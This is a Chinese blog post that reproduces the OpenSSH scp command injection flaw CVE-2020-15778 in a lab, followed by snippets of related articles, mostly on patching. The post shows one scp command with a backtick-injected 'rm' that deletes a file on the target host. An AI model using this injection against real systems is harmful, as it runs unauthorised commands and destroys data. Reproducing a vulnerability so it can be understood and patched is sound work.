OpenSSH 命令注入漏洞(CVE-2020-15778)复现

最新推荐文章于 2024-05-16 15:09:44 发布
最新推荐文章于 2024-05-16 15:09:44 发布
阅读量3.4k 收藏 2
点赞数
分类专栏: 漏洞利用 文章标签: ssh 运维 scp CVE-2020-15778 命令注入漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WZZ_2363173126/article/details/120732487
版权

漏洞描述

    OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。
    OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

漏洞复现

    使用以下命令查看OPENSSH的版本:

ssh -V

ssh_version
    看到OPENSSH版本为OPENSSH 7.4p1。该版本中的SCP指令存在命令注入漏洞(CVE-2020-15778)。
    在目标主机中创建/home/jaruser/tmp/文件夹,并在该路径下创建test.txt文件
before
    在攻击主机中使用以下指令,在scp CVE-2020-15778.txt jaruser@192.168.100.136:/home/jaruser/tmp命令中注入恶意命令rm /home/jaruser/tmp/test.txt

scp CVE-2020-15778.txt jaruser@192.168.100.136:'`rm /home/jaruser/tmp/test.txt ` /home/jaruser/tmp'

    运行指令并输入密码后,scp指令顺利执行:
attack
    与此同时,恶意指令也被一起执行了,目标主机/home/jaruser/tmp/路径下的test.txt文件被删除了:
after

Dennis F
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Openssh漏洞升级修
weixin_54626591的博客
08-17 648
Openssh漏洞升级修
centos升级openssh7.4,OpenSSH远程代码执行漏洞
weixin_33738578的博客
05-15 5190
漏洞编号CVE-2016-10009漏洞名称OpenSSH远程代码执行漏洞漏洞描述sshd服务可以利用转发的agent-socket文件,欺骗本机的ssh-agent来加载一个恶意的PKCS#11模块,从而可以远程执行代码。官方评级中危漏洞危害***利用漏洞远程命令执行,严重情况下可能会导致数据泄露。漏洞利用条件可以实远程利用。该漏洞利用依赖ssh-agent。该进程默...
Nessus漏洞扫描以及OpenSSH漏洞验证
啊酒弟弟的博客
05-03 2279
同样是openssh7.4p1的软件包 后缀16和后缀22 两个数字明显不同,其实这意味着红帽对openssh7.4p1 这个软件包进行了版本修订(漏洞),可以在红帽官方查看到,例如CVE-2021-41617。这里进行第二次漏洞扫描,可以看到相应的漏洞数量确实减少了,原先严重类型由81降低到了73,高类型由227降低到了217,中等类型由88降低到了81。的修方式就是更新最新版本的rpm包,详细可见https://access.redhat.com/errata/RHSA-2021:4782。
OpenSSH 命令注入漏洞(CVE-2020-15778)修教程_openssh_8(1)
最新发布
m0_60607927的博客
05-16 376
2021年来,云主机进行了漏洞扫描,出了大量openssh漏洞,我尝试升级过8.4、8.5的版本。16、mysql的innodb如何定位锁问题,mysql如何减少主从制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?
OpenSSH 曝远程代码执行漏洞,尽快升级
郑帅的博客
12-23 8543
导读 12月19日,国外漏洞平台 securityfocus上发布了最新的 OpenSSHCVE-2016-10009)远程代码执行漏洞。由于问题出在ssh-agent,这个进程默认不启动、只在多主机间免密码登录时才会用到,漏洞利用条件也比较苛刻,因此官方漏洞评级仅“中危”。用户仍需尽快升级至最新版本。 OpenSSH 7.4已于2016年12月19日正式发布,新版本移植了在
HackTheBox::Networked
aya3t的博客
10-12 744
HackTheBox::Networked
OpenSSH 漏洞升级最新版本(修改版)
Leckun的专栏
01-08 562
Centos7系统ssh默认版本一般是OpenSSH7.4左右,低版本是有漏洞的而且是高危漏洞,在软件交付和安全扫描上是过不了关的,一般情况需要升级OpenSSH的最新版本今天详细说下升级最新版本的处理过程(认真看会发操作很简单,因为写的操作很详细…)
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级opensshOpenSSH8.4 修openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
openssh 7.6p1 x86_64
11-10
openssh 7.6p1 ,在ORACLE LINUX 7.4编译,适用于centos 6,7 ,redhat 6,7
OpenSSH用户枚举漏洞poc(CVE-2018-15473)
08-24
OpenSSH用户枚举漏洞poc(CVE-2018-15473),通过poc可以直接检查目标服务器是否存在此漏洞,通过检查漏洞,来及早发漏洞,打上补丁
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
openssh漏洞_OpenSSH命令注入漏洞(CVE202015778)
weixin_39998273的博客
12-06 2866
安全漏洞VULNERABILITYOpenSSH命令注入漏洞(CVE-2020-15778)0x00软件介绍OpenSSH是SSH(Secure SHell)协议的免费开源实OpenSSH是一套用于安全访问计算机的连接工具,支持对所有的传输进行加密。openssh-8.3p1及以前版本中scp 中的scp.c文件存在操作系统命令注入漏洞,该漏洞源于外部输入数据构造操作系统可执...
OpenSSH版本升级和漏洞问题
不啃指甲的博客
08-22 909
大家好,这篇为大家介绍二进制方式对OpenSSH版本升级,在生产环境中可用于解决版本升级、漏洞等。
telnet 连接 socket 服务接口返回 SSH-2.0-OpenSSH_7.4
witkey_ak9896的博客
04-16 3271
这说明您连接的是一个运行 SSH 服务的 socket。通常情况下,telnet 连接的是一个运行 telnet 服务的 socket,但是如果您连接的是一个运行 SSH 服务的 socket,您就会看到 "SSH-2.0-OpenSSH_7.4" 这样的提示。最近需要部署一套 sockert 长连接程序到服务器,让运维开放服务器端口出来,然后测试发报 SSH-2.0-OpenSSH_7.4 , 用 telnet 连接后 发送消息,服务端程序未收到什么数据。
OpenSSH命令注入漏洞(CVE-2020-15778)
热门推荐
qq_42947816的博客
02-09 2万+
一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用。
解决OPENSSL安全漏洞(CVE-2021-41617)
qq_55854984的博客
01-16 935
#注意“/usr/local/libexec/sftp-server”的地址需根据实际环境来,一般为“/usr/local/libexec/sftp-server”##也有的为“/usr/local/libexec/openssh/sftp-server”###以下命令物理机执行,ECS服务器不存在sshd.service配置文件 ,可跳过。#当前系统版本,即openssh版本。#遇到报错,安装相关依赖。#输入yes,覆盖文件。#检查通过,开始编译。#创建系统初始化脚本。
openssh 命令注入漏洞(cve-2020-15778)
05-26
您好,关于openssh命令注入漏洞(cve-2020-15778),这是一个影响OpenSSH版本7.2到7.9p1的漏洞,攻击者可以利用该漏洞在受害系统上执行任意命令。建议用户及时升级OpenSSH版本到7.9p1或更新版本,并且在防火墙等安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值